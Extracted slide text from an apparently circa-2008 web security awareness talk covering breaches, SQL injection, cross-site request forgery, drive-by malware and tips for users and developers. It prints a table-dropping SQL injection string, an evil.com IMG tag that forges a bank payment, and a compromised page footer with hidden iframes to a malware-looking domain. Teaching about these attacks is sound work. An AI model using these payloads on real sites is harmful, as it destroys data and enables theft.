Overview
Data breaches Hacking / Web application vulnerabilities What can software developers do?
Malware distribution What is Google doing?
What can you do to protect yourself?
Is the sky falling?
• TJX (March 2007)– owns TJ Maxx, Marshalls, and other dept stores– over 45 million credit card (CC) #s dating back to 2002– attacks exploited WEP used at branches
• Department of Veteran Affairs (August 2006)Unisys (sub-contractor) took equipment home/burglarizedName, DOB, SSN, address, insurance for 26.5M veteransEmployee dismissed, supervisor resigned
CardSystems (June 2005)credit card payment processing company: out of business43 million CC #s stored unencrypted / compromised263,000 CC #s stolen from database via SQL Injection
Data Breaches
Over 230 million lost or stolen customer records since 2005. How did that happen?
Source: privacyrights.org
Hacking
StolenEquipment
LostEquipment
Username &Password
SELECT passwdFROM USERS
WHERE uname IS ‘$username’
Normal QueryNormal Query
WebBrowser
WebServer Database
01001010101010100101
SELECT passwdFROM USERS
WHERE uname IS ‘’; DROP TABLE
USERS; -- '
Malicious QueryMalicious Query
Eliminates all Eliminates all user user
accountsaccounts
“Username &Password”
WebBrowser
WebServer Database
Cross-Site-Request-Forgery (XRSF)
Attack scenario:Alice is using a (“good”) web-application:
www.bank.com
(assume user is logged in w/ cookie)
At the same time (i.e. same browser session), she’s also visiting a “malicious” web-application:
www.evil.com
XSRF
/viewbalanceCookie: sessionid=40a4c04de
““Your balance is $25,000”Your balance is $25,000”
Alice bank.com/login.html
/authuname=alice&pass=ilovebobCookie: sessionid=40a4c04de
evil.com
XSRFAlice bank.com
/login.html
/authuname=alice&pass=ilovebobCookie: sessionid=40a4c04de
/evil.html<IMG SRC=http://bank.com/paybill?addr=123 evil st & amt=$10000>
/paybill?addr=123 evil st, amt=$10000Cookie: sessionid=40a4c04de
““OK. Payment Sent!”OK. Payment Sent!”
What can the software community do?
Software Developers: Arm / educate yourself! (e.g., www.learnsecurity.com) Elect a security czar for each project
Managers: Instrument development process for security Organize for security (advisors, satellites, etc) Invest in training!
Malware
Logs keystrokes (including passwords) Joins a botnet Sends email spam from your machine Other countless bad things...
<!--Copyright Information --> <div align=’center’class=’copyright’>Powered by <a href="http://www.invisionboard.com">InvisionPowerBoard</a>(U) v1.3.1 Final©2003 <a href=’http://www.invisionpower.com’>IPS,Inc.</a></div><iframe src=’http://wsfgfdgrtyhgfd.net/adv/193/new.php’></iframe> <iframe src=’http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193’></iframe>
Malware Distribution
Old style: email, peer-to-peer, etc New style: infect web pages &
drive-by-downloads
Building Botnets with SQL Injection
Query forvulnerable sites
Attacker Target Site(s)
Query forvulnerable sites
SearchEngineSearchEngine Target Site(s)
User
View Page
Get Infected:Drive-by-download
Inject maliciousJavascript/ActiveX
What do you want to do today?
Log keystrokes, DoS, etc.
Social Engineering
BREAKING NEWS: Abortion outlawed in California How to save money on gas Millions of credit card numbers stolen from bank
database, find out if you are affected Google launches free music downloads in China Jerry Yang relinquishes control over Yahoo McCain gives up fighting for presidency US Dollar hits 6-year high, further gains expected
What can you do to protect yourself?
Change default router password. Use WPA. Use a personal firewall. Always keep ON. Use good anti-virus. (e.g. pack.google.com) Install patches immediately. Use auto-update. Make backups or use backup service. Use browser with malware & phishing
protection (e.g. Firefox 3).
What can you do to protect yourself?
Don't install software you don't trust. Use bookmarks for financial sites (or Google). Check for SSL / HTTPS for important sites. Don't ignore security warnings. Use good passwords and reset questions. Use a credit card with a threshold limit.
Consider virtual, one-time credit cards. If it sounds too good to be true, it probably is!
Summary
What can software people do? Learn, organize, prevent, etc
What is Google doing? Protecting you while you search & browse
What can you do? Be vigilant!